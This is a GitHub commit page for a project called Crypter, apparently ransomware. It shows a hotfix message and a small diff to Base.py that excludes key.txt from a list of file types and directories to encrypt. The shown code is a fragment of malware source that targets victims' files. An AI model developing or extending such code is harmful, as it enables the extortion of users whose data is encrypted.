Skip to content

Commit

Permalink
Merge branch 'hotfix/1.01'
Browse files Browse the repository at this point in the history
- Crypter will no longer attempt encryption of the Crypter binary, and the
  key.txt file
- Corrected incorrect build configurations which would break the build
  process.
- Corrected UPX path to most recent version
  • Loading branch information
sithis committed Jun 21, 2017
2 parents d99b970 + dc0d972 commit 9e7d491
Show file tree
Hide file tree
Showing 5 changed files with 25 additions and 503 deletions.
6 changes: 6 additions & 0 deletions Crypter/Base.py
Original file line number Diff line number Diff line change
Expand Up @@ -80,6 +80,12 @@ class Base():
# COMPRESSION FORMATS
"tgz", "zip", "rar"
]


FILES_TO_EXCLUDE = [
"key.txt"
]


def get_base_dirs(self, home_dir):
# Function to return a list of base directories to encrypt
Expand Down
Loading

0 comments on commit 9e7d491

Please sign in to comment.